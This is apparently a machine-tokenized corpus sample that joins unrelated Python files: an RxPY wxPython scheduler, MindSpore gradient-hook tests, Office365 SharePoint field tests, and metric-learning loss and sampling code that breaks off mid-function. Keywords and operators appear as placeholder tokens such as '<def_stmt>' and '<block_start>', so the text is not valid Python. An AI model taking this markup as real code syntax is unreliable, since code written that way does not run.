<import_stmt>logging<import_from_stmt>rx.core Disposable<import_from_stmt>rx.disposables SingleAssignmentDisposable CompositeDisposable<import_from_stmt>rx.concurrency.schedulerbase SchedulerBase<line_sep>log=logging.getLogger("Rx")<class_stmt>WxScheduler(SchedulerBase)<block_start>"""A scheduler for a wxPython event loop."""<def_stmt>__init__ self wx<block_start>self.wx=wx<line_sep>self._timers=set()<class_stmt>Timer(wx.Timer)<block_start><def_stmt>__init__ self callback<block_start>super(Timer self).__init__()<line_sep>self.callback=callback<block_end><def_stmt>Notify self<block_start>self.callback()<block_end><block_end>self._timer_class=Timer<block_end><def_stmt>cancel_all self<block_start>"""Cancel all scheduled actions.
Should be called when destroying wx controls to prevent accessing
dead wx objects in actions that might be pending.
"""<for_stmt>timer self._timers<block_start>timer.Stop()<block_end><block_end><def_stmt>_wxtimer_schedule self time action state periodic=<false><block_start>scheduler=self<line_sep>msecs=self.to_relative(time)<line_sep>disposable=SingleAssignmentDisposable()<line_sep>periodic_state=[state]<def_stmt>interval <block_start><if_stmt>periodic<block_start>periodic_state[0]=action(periodic_state[0])<block_end><else_stmt><block_start>disposable.disposable=action(scheduler state)<block_end><block_end>log.debug("timeout: %s" msecs)<if_stmt>msecs<eq>0<block_start>msecs=1<block_end># wx.Timer doesn't support zero.
timer=self._timer_class(interval)<line_sep>timer.Start(msecs self.wx.TIMER_CONTINUOUS<if>periodic<else>self.wx.TIMER_ONE_SHOT)<line_sep>self._timers.add(timer)<def_stmt>dispose <block_start>timer.Stop()<line_sep>self._timers.remove(timer)<block_end><return>CompositeDisposable(disposable Disposable.create(dispose))<block_end><def_stmt>schedule self action state=<none><block_start>"""Schedules an action to be executed."""<line_sep><return>self._wxtimer_schedule(0 action state)<block_end><def_stmt>schedule_relative self duetime action state=<none><block_start>"""Schedules an action to be executed after duetime.
Keyword arguments:
duetime -- {timedelta} Relative time after which to execute the action.
action -- {Function} Action to be executed.
Returns {Disposable} The disposable object used to cancel the scheduled
action (best effort)."""<line_sep><return>self._wxtimer_schedule(duetime action state)<block_end><def_stmt>schedule_absolute self duetime action state=<none><block_start>"""Schedules an action to be executed at duetime.
Keyword arguments:
duetime -- {datetime} Absolute time after which to execute the action.
action -- {Function} Action to be executed.
Returns {Disposable} The disposable object used to cancel the scheduled
action (best effort)."""<line_sep>duetime=self.to_datetime(duetime)<line_sep><return>self._wxtimer_schedule(duetime action state)<block_end><def_stmt>schedule_periodic self period action state=<none><block_start>"""Schedules a periodic piece of work to be executed in the Qt
mainloop.
Keyword arguments:
period -- Period in milliseconds for running the work periodically.
action -- Action to be executed.
state -- [Optional] Initial state passed to the action upon the first
iteration.
Returns the disposable object used to cancel the scheduled recurring
action (best effort)."""<line_sep><return>self._wxtimer_schedule(period action state periodic=<true>)<block_end><block_end> |
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
<import_stmt>pytest<import_stmt>numpy<as>np<import_stmt>mindspore.nn<as>nn<import_stmt>mindspore.common.dtype<as>mstype<import_from_stmt>mindspore Tensor<import_from_stmt>mindspore context<import_from_stmt>mindspore ParameterTuple<import_from_stmt>mindspore.nn Momentum<import_from_stmt>mindspore.nn WithLossCell<import_from_stmt>mindspore.ops composite<as>C<import_from_stmt>mindspore.ops operations<as>P<import_from_stmt>mindspore.common.initializer TruncatedNormal<line_sep>context.set_context(mode=context.PYNATIVE_MODE device_target="Ascend")<line_sep>grad_all=C.GradOperation(get_all=<true>)<def_stmt>weight_variable <block_start>"""weight initial"""<line_sep><return>TruncatedNormal(0.02)<block_end><def_stmt>conv in_channels out_channels kernel_size stride=1 padding=0<block_start>"""weight initial for conv layer"""<line_sep>weight=weight_variable()<line_sep><return>nn.Conv2d(in_channels out_channels kernel_size=kernel_size stride=stride padding=padding weight_init=weight has_bias=<false> pad_mode="valid")<block_end><def_stmt>fc_with_initialize input_channels out_channels<block_start>"""weight initial for fc layer"""<line_sep>weight=weight_variable()<line_sep>bias=weight_variable()<line_sep><return>nn.Dense(input_channels out_channels weight bias)<block_end><class_stmt>test_custom_hook_function_base()<block_start><def_stmt>__init__ self<block_start><pass><block_end><def_stmt>test_custom_hook_function self hook_function cell_hook_function<block_start><return>hook_function cell_hook_function<block_end><block_end><def_stmt>cell_hook_function_print_grad cell_id grad_input grad_output<block_start><assert_stmt>grad_output[0].asnumpy().shape<eq>(32 6 14 14)<assert_stmt>grad_input[0].asnumpy().shape<eq>(32 16 10 10)<block_end><def_stmt>custom_hook_function_print_and_save_grad grad_out<block_start><assert_stmt>grad_out[0].asnumpy().shape<eq>(32 6 28 28)<block_end><class_stmt>LeNet5(nn.Cell)<block_start><def_stmt>__init__ self hook_function cell_hook_function 
num_class=10<block_start>super(LeNet5 self).__init__()<line_sep>self.num_class=num_class<line_sep>self.batch_size=32<line_sep>self.conv1=conv(1 6 5)<line_sep>self.conv2=conv(6 16 5)<line_sep>self.conv1.register_backward_hook(cell_hook_function)<line_sep>self.fc1=fc_with_initialize(16<times>5<times>5 120)<line_sep>self.fc2=fc_with_initialize(120 84)<line_sep>self.fc3=fc_with_initialize(84 self.num_class)<line_sep>self.relu=nn.ReLU()<line_sep>self.max_pool2d=nn.MaxPool2d(kernel_size=2 stride=2)<line_sep>self.reshape=P.Reshape()<line_sep>self.hook=P.HookBackward(hook_function)<block_end><def_stmt>construct self x<block_start>x=self.conv1(x)<line_sep>x=self.relu(x)<line_sep>x=self.hook(x)<line_sep>x=self.max_pool2d(x)<line_sep>x=self.conv2(x)<line_sep>x=self.relu(x)<line_sep>x=self.max_pool2d(x)<line_sep>x=self.reshape(x (self.batch_size -1))<line_sep>x=self.fc1(x)<line_sep>x=self.relu(x)<line_sep>x=self.fc2(x)<line_sep>x=self.relu(x)<line_sep>x=self.fc3(x)<line_sep><return>x<block_end><block_end><class_stmt>GradWrap(nn.Cell)<block_start>""" GradWrap definition """<def_stmt>__init__ self network<block_start>super(GradWrap self).__init__(auto_prefix=<false>)<line_sep>self.network=network<line_sep>self.weights=ParameterTuple(filter(<lambda>x:x.requires_grad network.get_parameters()))<block_end><def_stmt>construct self x label<block_start>weights=self.weights<line_sep><return>C.GradOperation(get_by_list=<true>)(self.network weights)(x label)<block_end><block_end><class_stmt>test_custom_cell_base()<block_start><def_stmt>__init__ self<block_start><pass><block_end><def_stmt>test_custom_cell_function self cell<block_start><return>cell<block_end><block_end><class_stmt>MulAdd(nn.Cell)<block_start><def_stmt>construct self x y<block_start><return>2<times>x+y<block_end><def_stmt>bprop self x y out dout<block_start><assert_stmt>x.asnumpy()<eq>1.0<assert_stmt>y.asnumpy()<eq>2.0<assert_stmt>out.asnumpy()<eq>4.0<assert_stmt>dout.asnumpy()<eq>1.0<line_sep><return>dout 
y<block_end><block_end><class_stmt>Ms_Cell(nn.Cell)<block_start><def_stmt>__init__ self<block_start>super(Ms_Cell self).__init__()<line_sep>self.relu=P.ReLU()<block_end><def_stmt>construct self x<block_start><return>self.relu(x)<block_end><def_stmt>bprop self x out dout<block_start>dout=Tensor(np.float32(0.0))<assert_stmt>dout.shape<eq>()<line_sep><return>dout<block_end><block_end><class_stmt>Ms_Cell_Change_Shape(nn.Cell)<block_start><def_stmt>__init__ self<block_start>super(Ms_Cell_Change_Shape self).__init__()<line_sep>self.relu=P.ReLU()<block_end><def_stmt>construct self x<block_start><return>self.relu(x)<block_end><def_stmt>bprop self x out dout<block_start>dout=Tensor(np.ones([5 5]).astype(np.float32))<assert_stmt>dout.shape<eq>(5 5)<line_sep><return>dout<block_end><block_end>@pytest.mark.level1@pytest.mark.platform_arm_ascend_training@pytest.mark.platform_x86_ascend_training@pytest.mark.env_onecard<def_stmt>test_pynative_lenet_train_hook_function_print_and_save_grad <block_start>hook=test_custom_hook_function_base()<line_sep>function=hook.test_custom_hook_function(custom_hook_function_print_and_save_grad cell_hook_function_print_grad)<line_sep>net=LeNet5(hook_function=function[0] cell_hook_function=function[1])<line_sep>optimizer=Momentum(filter(<lambda>x:x.requires_grad net.get_parameters()) 0.1 0.9)<line_sep>criterion=nn.SoftmaxCrossEntropyWithLogits(sparse=<false>)<line_sep>net_with_criterion=WithLossCell(net criterion)<line_sep>train_network=GradWrap(net_with_criterion)<line_sep>train_network.set_train()<line_sep>input_data=Tensor(np.ones([net.batch_size 1 32 32]).astype(np.float32)<times>0.01)<line_sep>label=Tensor(np.ones([net.batch_size net.num_class]).astype(np.float32))<line_sep>output=net(Tensor(input_data))<line_sep>criterion(output label)<line_sep>grads=train_network(input_data 
label)<line_sep>success=optimizer(grads)<assert_stmt>success<block_end>@pytest.mark.level1@pytest.mark.platform_arm_ascend_training@pytest.mark.platform_x86_ascend_training@pytest.mark.env_onecard<def_stmt>test_pynative_custom_bprop_and_Cell_MulAdd <block_start>custom_cell=test_custom_cell_base()<line_sep>mul_add=custom_cell.test_custom_cell_function(MulAdd())<line_sep>mul_add.bprop_debug=<true><line_sep>grad_all(mul_add)(Tensor(1 mstype.float32) Tensor(2 mstype.float32))<assert_stmt>grad_all(mul_add)(Tensor(1 mstype.float32) Tensor(2 mstype.float32))<eq>(Tensor(1.0 mstype.float32) Tensor(2.0 mstype.float32))<block_end>@pytest.mark.level1@pytest.mark.platform_arm_ascend_training@pytest.mark.platform_x86_ascend_training@pytest.mark.env_onecard<def_stmt>test_pynative_custom_bprop_and_Cell_Ms_Cell_Change_Shape <block_start>custom_cell=test_custom_cell_base()<line_sep>ms_Cell=custom_cell.test_custom_cell_function(Ms_Cell_Change_Shape())<line_sep>ms_Cell.bprop_debug=<true><with_stmt>pytest.raises(RuntimeError)<as>ex<block_start>grad_all(ms_Cell)(Tensor(1 mstype.float32))<block_end><assert_stmt>"Shapes of input and parameter are different, input index"<in>str(ex.value)<block_end>@pytest.mark.level1@pytest.mark.platform_arm_ascend_training@pytest.mark.platform_x86_ascend_training@pytest.mark.env_onecard<def_stmt>test_pynative_custom_bprop_and_Cell_Ms_Cell <block_start>custom_cell=test_custom_cell_base()<line_sep>ms_Cell=custom_cell.test_custom_cell_function(Ms_Cell())<line_sep>ms_Cell.bprop_debug=<true><assert_stmt>grad_all(ms_Cell)(Tensor(1 mstype.float32))<eq>(Tensor(0.0 mstype.float32) )<block_end> |
<import_stmt>uuid<import_from_stmt>tests.sharepoint.sharepoint_case SPTestCase<import_from_stmt>office365.sharepoint.fields.field Field<import_from_stmt>office365.sharepoint.fields.field_creation_information FieldCreationInformation<import_from_stmt>office365.sharepoint.fields.field_text FieldText<import_from_stmt>office365.sharepoint.fields.field_type FieldType<class_stmt>TestField(SPTestCase)<block_start>target_field=<none># type: Field
target_field_name="Title"<def_stmt>test_1_get_site_fields self<block_start>site_fields=self.client.site.root_web.fields.top(2).get().execute_query()<line_sep>self.assertGreater(len(site_fields) 0)<block_end><def_stmt>test_2_get_field self<block_start>title_field=self.client.site.root_web.fields.get_by_internal_name_or_title(self.target_field_name).get().execute_query()<line_sep>self.assertIsNotNone(title_field.internal_name)<line_sep>self.assertEqual(title_field.internal_name self.target_field_name)<line_sep>self.assertIsInstance(title_field FieldText)<line_sep>self.assertIsNotNone(title_field.max_length)<block_end><def_stmt>test_3_get_field_by_title self<block_start>title_field=self.client.site.root_web.fields.get_by_title(self.target_field_name).get().execute_query()<line_sep>self.assertIsNotNone(title_field.internal_name)<line_sep>self.assertEqual(title_field.internal_name self.target_field_name)<block_end><def_stmt>test_4_create_site_field self<block_start>field_name="Title_"+uuid.uuid4().hex<line_sep>create_field_info=FieldCreationInformation(field_name FieldType.Text)<line_sep>created_field=self.client.site.root_web.fields.add(create_field_info).execute_query()<line_sep>self.assertEqual(created_field.properties["Title"] field_name)<line_sep>self.__class__.target_field=created_field<block_end><def_stmt>test_5_update_site_field self<block_start>field_to_update=self.__class__.target_field<line_sep>updated_field_name="Title_"+uuid.uuid4().hex<line_sep>field_to_update.set_property('Title' updated_field_name).update().execute_query()<line_sep>updated_field=self.client.site.root_web.fields.get_by_title(updated_field_name).get().execute_query()<line_sep>self.assertIsNotNone(updated_field.id)<line_sep>self.assertEqual(updated_field.title updated_field_name)<block_end><def_stmt>test_6_delete_site_field self<block_start>field_to_delete=self.__class__.target_field<line_sep>field_to_delete.delete_object().execute_query()<block_end><block_end> |
# Copyright 2019 <NAME> and <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
###################### LIBRARIES #################################################
<import_stmt>warnings<line_sep>warnings.filterwarnings("ignore")<import_stmt>torch random itertools<as>it numpy<as>np faiss random<import_from_stmt>tqdm tqdm<import_from_stmt>scipy.spatial.distance cdist<import_from_stmt>sklearn.decomposition PCA<import_from_stmt>sklearn.preprocessing normalize<import_from_stmt>PIL Image<line_sep>"""================================================================================================="""<line_sep>############ LOSS SELECTION FUNCTION #####################
<def_stmt>loss_select loss opt to_optim<block_start>"""
Selection function which returns the respective criterion while appending to list of trainable parameters if required.
Args:
loss: str, name of loss function to return.
opt: argparse.Namespace, contains all training-specific parameters.
to_optim: list of trainable parameters. Is extend if loss function contains those as well.
Returns:
criterion (torch.nn.Module inherited), to_optim (optionally appended)
"""<if_stmt>loss<eq>'triplet'<block_start>loss_params={'margin':opt.margin 'sampling_method':opt.sampling}<line_sep>criterion=TripletLoss(**loss_params)<block_end><elif_stmt>loss<eq>'npair'<block_start>loss_params={'l2':opt.l2npair}<line_sep>criterion=NPairLoss(**loss_params)<block_end><elif_stmt>loss<eq>'marginloss'<block_start>loss_params={'margin':opt.margin 'nu':opt.nu 'beta':opt.beta 'n_classes':opt.num_classes 'sampling_method':opt.sampling}<line_sep>criterion=MarginLoss(**loss_params)<line_sep>to_optim<augadd>[{'params':criterion.parameters() 'lr':opt.beta_lr 'weight_decay':0}]<block_end><elif_stmt>loss<eq>'proxynca'<block_start>loss_params={'num_proxies':opt.num_classes 'embedding_dim':opt.classembed<if>'num_cluster'<in>vars(opt).keys()<else>opt.embed_dim}<line_sep>criterion=ProxyNCALoss(**loss_params)<line_sep>to_optim<augadd>[{'params':criterion.parameters() 'lr':opt.proxy_lr}]<block_end><elif_stmt>loss<eq>'crossentropy'<block_start>loss_params={'n_classes':opt.num_classes 'inp_dim':opt.embed_dim}<line_sep>criterion=CEClassLoss(**loss_params)<line_sep>to_optim<augadd>[{'params':criterion.parameters() 'lr':opt.lr 'weight_decay':0}]<block_end><else_stmt><block_start><raise>Exception('Loss {} not available!'.format(loss))<block_end><return>criterion to_optim<block_end>"""================================================================================================="""<line_sep>######### MAIN SAMPLER CLASS #################################
<class_stmt>TupleSampler()<block_start>"""
Container for all sampling methods that can be used in conjunction with the respective loss functions.
Based on batch-wise sampling, i.e. given a batch of training data, sample useful data tuples that are
used to train the network more efficiently.
"""<def_stmt>__init__ self method='random'<block_start>"""
Args:
method: str, name of sampling method to use.
Returns:
Nothing!
"""<line_sep>self.method=method<if_stmt>method<eq>'semihard'<block_start>self.give=self.semihardsampling<block_end><if_stmt>method<eq>'softhard'<block_start>self.give=self.softhardsampling<block_end><elif_stmt>method<eq>'distance'<block_start>self.give=self.distanceweightedsampling<block_end><elif_stmt>method<eq>'npair'<block_start>self.give=self.npairsampling<block_end><elif_stmt>method<eq>'random'<block_start>self.give=self.randomsampling<block_end><block_end><def_stmt>randomsampling self batch labels<block_start>"""
This methods finds all available triplets in a batch given by the classes provided in labels, and randomly
selects <len(batch)> triplets.
Args:
batch: np.ndarray or torch.Tensor, batch-wise embedded training samples.
labels: np.ndarray or torch.Tensor, ground truth labels corresponding to batch.
Returns:
list of sampled data tuples containing reference indices to the position IN THE BATCH.
"""<if_stmt>isinstance(labels torch.Tensor)<block_start>labels=labels.detach().numpy()<block_end>unique_classes=np.unique(labels)<line_sep>indices=np.arange(len(batch))<line_sep>class_dict={i:indices[labels<eq>i]<for>i unique_classes}<line_sep>sampled_triplets=[list(it.product([x] [x] [y<for>y unique_classes<if>x<ne>y]))<for>x unique_classes]<line_sep>sampled_triplets=[x<for>y sampled_triplets<for>x y]<line_sep>sampled_triplets=[[x<for>x list(it.product(*[class_dict[j]<for>j i]))<if>x[0]<ne>x[1]]<for>i sampled_triplets]<line_sep>sampled_triplets=[x<for>y sampled_triplets<for>x y]<line_sep>#NOTE: The number of possible triplets is given by #unique_classes*(2*(samples_per_class-1)!)*(#unique_classes-1)*samples_per_class
sampled_triplets=random.sample(sampled_triplets batch.shape[0])<line_sep><return>sampled_triplets<block_end><def_stmt>semihardsampling self batch labels margin=0.2<block_start><if_stmt>isinstance(labels torch.Tensor)<block_start>labels=labels.detach().numpy()<block_end>bs=batch.size(0)<line_sep>#Return distance matrix for all elements in batch (BSxBS)
distances=self.pdist(batch.detach()).detach().cpu().numpy()<line_sep>positives,negatives=[] []<line_sep>anchors=[]<for_stmt>i range(bs)<block_start>l,d=labels[i] distances[i]<line_sep>neg=labels<ne>l<line_sep>pos=labels<eq>l<line_sep>anchors.append(i)<line_sep>pos[i]=<false><line_sep>p=np.random.choice(np.where(pos)[0])<line_sep>positives.append(p)<line_sep>#Find negatives that violate tripet constraint semi-negatives
neg_mask=np.logical_and(neg d<g>d[p])<line_sep>neg_mask=np.logical_and(neg_mask d<l>margin+d[p])<if_stmt>neg_mask.sum()<g>0<block_start>negatives.append(np.random.choice(np.where(neg_mask)[0]))<block_end><else_stmt><block_start>negatives.append(np.random.choice(np.where(neg)[0]))<block_end><block_end>sampled_triplets=[[a p n]<for>a,p,n zip(anchors positives negatives)]<line_sep><return>sampled_triplets<block_end><def_stmt>softhardsampling self batch labels<block_start>"""
This methods finds all available triplets in a batch given by the classes provided in labels, and select
triplets based on semihard sampling introduced in 'https://arxiv.org/pdf/1503.03832.pdf'.
Args:
batch: np.ndarray or torch.Tensor, batch-wise embedded training samples.
labels: np.ndarray or torch.Tensor, ground truth labels corresponding to batch.
Returns:
list of sampled data tuples containing reference indices to the position IN THE BATCH.
"""<if_stmt>isinstance(labels torch.Tensor)<block_start>labels=labels.detach().numpy()<block_end>bs=batch.size(0)<line_sep>#Return distance matrix for all elements in batch (BSxBS)
distances=self.pdist(batch.detach()).detach().cpu().numpy()<line_sep>positives,negatives=[] []<line_sep>anchors=[]<for_stmt>i range(bs)<block_start>l,d=labels[i] distances[i]<line_sep>anchors.append(i)<line_sep>#1 for batchelements with label l
neg=labels<ne>l<line_sep>pos=labels<eq>l<line_sep>#0 for current anchor
pos[i]=<false><line_sep>#Find negatives that violate triplet constraint semi-negatives
neg_mask=np.logical_and(neg d<l>d[np.where(pos)[0]].max())<line_sep>#Find positives that violate triplet constraint semi-hardly
pos_mask=np.logical_and(pos d<g>d[np.where(neg)[0]].min())<if_stmt>pos_mask.sum()<g>0<block_start>positives.append(np.random.choice(np.where(pos_mask)[0]))<block_end><else_stmt><block_start>positives.append(np.random.choice(np.where(pos)[0]))<block_end><if_stmt>neg_mask.sum()<g>0<block_start>negatives.append(np.random.choice(np.where(neg_mask)[0]))<block_end><else_stmt><block_start>negatives.append(np.random.choice(np.where(neg)[0]))<block_end><block_end>sampled_triplets=[[a p n]<for>a,p,n zip(anchors positives negatives)]<line_sep><return>sampled_triplets<block_end><def_stmt>distanceweightedsampling self batch labels lower_cutoff=0.5 upper_cutoff=1.4<block_start>"""
This methods finds all available triplets in a batch given by the classes provided in labels, and select
triplets based on distance sampling introduced in 'Sampling Matters in Deep Embedding Learning'.
Args:
batch: np.ndarray or torch.Tensor, batch-wise embedded training samples.
labels: np.ndarray or torch.Tensor, ground truth labels corresponding to batch.
lower_cutoff: float, lower cutoff value for negatives that are too close to anchor embeddings. Set to literature value. They will be assigned a zero-sample probability.
upper_cutoff: float, upper cutoff value for positives that are too far away from the anchor embeddings. Set to literature value. They will be assigned a zero-sample probability.
Returns:
list of sampled data tuples containing reference indices to the position IN THE BATCH.
"""<if_stmt>isinstance(labels torch.Tensor)<block_start>labels=labels.detach().cpu().numpy()<block_end>bs=batch.shape[0]<line_sep>distances=self.pdist(batch.detach()).clamp(min=lower_cutoff)<line_sep>positives,negatives=[] []<line_sep>labels_visited=[]<line_sep>anchors=[]<for_stmt>i range(bs)<block_start>neg=labels<ne>labels[i]<line_sep>pos=labels<eq>labels[i]<line_sep>q_d_inv=self.inverse_sphere_distances(batch distances[i] labels labels[i])<line_sep>#Sample positives randomly
pos[i]=0<line_sep>positives.append(np.random.choice(np.where(pos)[0]))<line_sep>#Sample negatives by distance
negatives.append(np.random.choice(bs p=q_d_inv))<block_end>sampled_triplets=[[a p n]<for>a,p,n zip(list(range(bs)) positives negatives)]<line_sep><return>sampled_triplets<block_end><def_stmt>npairsampling self batch labels<block_start>"""
This methods finds N-Pairs in a batch given by the classes provided in labels in the
creation fashion proposed in 'Improved Deep Metric Learning with Multi-class N-pair Loss Objective'.
Args:
batch: np.ndarray or torch.Tensor, batch-wise embedded training samples.
labels: np.ndarray or torch.Tensor, ground truth labels corresponding to batch.
Returns:
list of sampled data tuples containing reference indices to the position IN THE BATCH.
"""<if_stmt>isinstance(labels torch.Tensor)<block_start>labels=labels.detach().cpu().numpy()<block_end>label_set,count=np.unique(labels return_counts=<true>)<line_sep>label_set=label_set[count<ge>2]<line_sep>pos_pairs=np.array([np.random.choice(np.where(labels<eq>x)[0] 2 replace=<false>)<for>x label_set])<line_sep>neg_tuples=[]<for_stmt>idx range(len(pos_pairs))<block_start>neg_tuples.append(pos_pairs[np.delete(np.arange(len(pos_pairs)) idx) 1])<block_end>neg_tuples=np.array(neg_tuples)<line_sep>sampled_npairs=[[a p *list(neg)]<for>(a p),neg zip(pos_pairs neg_tuples)]<line_sep><return>sampled_npairs<block_end><def_stmt>pdist self A<block_start>"""
Efficient function to compute the distance matrix for a matrix A.
Args:
A: Matrix/Tensor for which the distance matrix is to be computed.
eps: float, minimal distance/clampling value to ensure no zero values.
Returns:
distance_matrix, clamped to ensure no zero values are passed.
"""<line_sep>prod=torch.mm(A A.t())<line_sep>norm=prod.diag().unsqueeze(1).expand_as(prod)<line_sep>res=(norm+norm.t()-2<times>prod).clamp(min=0)<line_sep><return>res.clamp(min=0).sqrt()<block_end><def_stmt>inverse_sphere_distances self batch dist labels anchor_label<block_start>"""
Function to utilise the distances of batch samples to compute their
probability of occurence, and using the inverse to sample actual negatives to the resp. anchor.
Args:
batch: torch.Tensor(), batch for which the sampling probabilities w.r.t to the anchor are computed. Used only to extract the shape.
dist: torch.Tensor(), computed distances between anchor to all batch samples.
labels: np.ndarray, labels for each sample for which distances were computed in dist.
anchor_label: float, anchor label
Returns:
distance_matrix, clamped to ensure no zero values are passed.
"""<line_sep>bs,dim=len(dist) batch.shape[-1]<line_sep>#negated log-distribution of distances of unit sphere in dimension <dim>
log_q_d_inv=((2.0-float(dim))<times>torch.log(dist)-(float(dim-3)/2)<times>torch.log(1.0-0.25<times>(dist.pow(2))))<line_sep>#Set sampling probabilities of positives to zero
log_q_d_inv[np.where(labels<eq>anchor_label)[0]]=0<line_sep>q_d_inv=torch.exp(log_q_d_inv-torch.max(log_q_d_inv))# - max(log) for stability
#Set sampling probabilities of positives to zero
q_d_inv[np.where(labels<eq>anchor_label)[0]]=0<line_sep>### NOTE: Cutting of values with high distances made the results slightly worse.
# q_d_inv[np.where(dist>upper_cutoff)[0]] = 0
#Normalize inverted distance for probability distr.
q_d_inv=q_d_inv/q_d_inv.sum()<line_sep><return>q_d_inv.detach().cpu().numpy()<block_end><block_end>"""================================================================================================="""<line_sep>### Standard Triplet Loss, finds triplets in Mini-batches.
<class_stmt>TripletLoss(torch.nn.Module)<block_start><def_stmt>__init__ self margin=1 sampling_method='random'<block_start>"""
Basic Triplet Loss as proposed in 'FaceNet: A Unified Embedding for Face Recognition and Clustering'
Args:
margin: float, Triplet Margin - Ensures that positives aren't placed arbitrarily close to the anchor.
Similarl, negatives should not be placed arbitrarily far away.
sampling_method: Method to use for sampling training triplets. Used for the TupleSampler-class.
"""<line_sep>super(TripletLoss self).__init__()<line_sep>self.margin=margin<line_sep>self.sampler=TupleSampler(method=sampling_method)<block_end><def_stmt>triplet_distance self anchor positive negative<block_start>"""
Compute triplet loss.
Args:
anchor, positive, negative: torch.Tensor(), resp. embeddings for anchor, positive and negative samples.
Returns:
triplet loss (torch.Tensor())
"""<line_sep><return>torch.nn.functional.relu((anchor-positive).pow(2).sum()-(anchor-negative).pow(2).sum()+self.margin)<block_end><def_stmt>forward self batch labels<block_start>"""
Args:
batch: torch.Tensor() [(BS x embed_dim)], batch of embeddings
labels: np.ndarray [(BS x 1)], for each element of the batch assigns a class [0,...,C-1]
Returns:
triplet loss (torch.Tensor(), batch-averaged)
"""<line_sep>#Sample triplets to use for training.
sampled_triplets=self.sampler.give(batch labels)<line_sep>#Compute triplet loss
loss=torch.stack([self.triplet_distance(batch[triplet[0] :] batch[triplet[1] :] batch[triplet[2] :])<for>triplet sampled_triplets])<line_sep><return>torch.mean(loss)<block_end><block_end>"""================================================================================================="""<line_sep>### Standard N-Pair Loss.
<class_stmt>NPairLoss(torch.nn.Module)<block_start><def_stmt>__init__ self l2=0.02<block_start>"""
Basic N-Pair Loss as proposed in 'Improved Deep Metric Learning with Multi-class N-pair Loss Objective'
Args:
l2: float, weighting parameter for weight penality due to embeddings not being normalized.
Returns:
Nothing!
"""<line_sep>super(NPairLoss self).__init__()<line_sep>self.sampler=TupleSampler(method='npair')<line_sep>self.l2=l2<block_end><def_stmt>npair_distance self anchor positive negatives<block_start>"""
Compute basic N-Pair loss.
Args:
anchor, positive, negative: torch.Tensor(), resp. embeddings for anchor, positive and negative samples.
Returns:
n-pair loss (torch.Tensor())
"""<line_sep><return>torch.log(1+torch.sum(torch.exp(anchor.mm((negatives-positive).transpose(0 1)))))<block_end><def_stmt>weightsum self anchor positive<block_start>"""
Compute weight penalty.
NOTE: Only need to penalize anchor and positive since the negatives are created based on these.
Args:
anchor, positive: torch.Tensor(), resp. embeddings for anchor and positive samples.
Returns:
torch.Tensor(), Weight penalty
"""<line_sep><return>torch.sum(anchor<power>2+positive<power>2)<block_end><def_stmt>forward self batch labels<block_start>"""
Args:
batch: torch.Tensor() [(BS x embed_dim)], batch of embeddings
labels: np.ndarray [(BS x 1)], for each element of the batch assigns a class [0,...,C-1]
Returns:
n-pair loss (torch.Tensor(), batch-averaged)
"""<line_sep>#Sample N-Pairs
sampled_npairs=self.sampler.give(batch labels)<line_sep>#Compute basic n=pair loss
loss=torch.stack([self.npair_distance(batch[npair[0]:npair[0]+1 :] batch[npair[1]:npair[1]+1 :] batch[npair[2:] :])<for>npair sampled_npairs])<line_sep>#Include weight penalty
loss=loss+self.l2<times>torch.mean(torch.stack([self.weightsum(batch[npair[0] :] batch[npair[1] :])<for>npair sampled_npairs]))<line_sep><return>torch.mean(loss)<block_end><block_end>"""================================================================================================="""<line_sep>### MarginLoss with trainable class separation margin beta. Runs on Mini-batches as well.
<class_stmt>MarginLoss(torch.nn.Module)<block_start><def_stmt>__init__ self margin=0.2 nu=0 beta=1.2 n_classes=100 beta_constant=<false> sampling_method='distance'<block_start>"""
Basic Margin Loss as proposed in 'Sampling Matters in Deep Embedding Learning'.
Args:
margin: float, fixed triplet margin (see also TripletLoss).
nu: float, regularisation weight for beta. Zero by default (in literature as well).
beta: float, initial value for trainable class margins. Set to default literature value.
n_classes: int, number of target class. Required because it dictates the number of trainable class margins.
beta_constant: bool, set to True if betas should not be trained.
sampling_method: str, sampling method to use to generate training triplets.
Returns:
Nothing!
"""<line_sep>super(MarginLoss self).__init__()<line_sep>self.margin=margin<line_sep>self.n_classes=n_classes<line_sep>self.beta_constant=beta_constant<line_sep>self.beta_val=beta<line_sep>self.beta=beta<if>beta_constant<else>torch.nn.Parameter(torch.ones(n_classes)<times>beta)<line_sep>self.nu=nu<line_sep>self.sampling_method=sampling_method<line_sep>self.sampler=TupleSampler(method=sampling_method)<block_end><def_stmt>forward self batch labels<block_start>"""
Args:
batch: torch.Tensor() [(BS x embed_dim)], batch of embeddings
labels: np.ndarray [(BS x 1)], for each element of the batch assigns a class [0,...,C-1]
Returns:
margin loss (torch.Tensor(), batch-averaged)
"""<if_stmt>isinstance(labels torch.Tensor)<block_start>labels=labels.detach().cpu().numpy()<block_end>sampled_triplets=self.sampler.give(batch labels)<line_sep>#Compute distances between anchor-positive and anchor-negative.
d_ap,d_an=[] []<for_stmt>triplet sampled_triplets<block_start>train_triplet={'Anchor':batch[triplet[0] :] 'Positive':batch[triplet[1] :] 'Negative':batch[triplet[2]]}<line_sep>pos_dist=((train_triplet['Anchor']-train_triplet['Positive']).pow(2).sum()+1e-8).pow(1/2)<line_sep>neg_dist=((train_triplet['Anchor']-train_triplet['Negative']).pow(2).sum()+1e-8).pow(1/2)<line_sep>d_ap.append(pos_dist)<line_sep>d_an.append(neg_dist)<block_end>d_ap,d_an=torch.stack(d_ap) torch.stack(d_an)<line_sep>#Group betas together by anchor class in sampled triplets (as each beta belongs to one class).
<if_stmt>self.beta_constant<block_start>beta=self.beta<block_end><else_stmt><block_start>beta=torch.stack([self.beta[labels[triplet[0]]]<for>triplet sampled_triplets]).type(torch.cuda.FloatTensor)<block_end>#Compute actual margin postive and margin negative loss
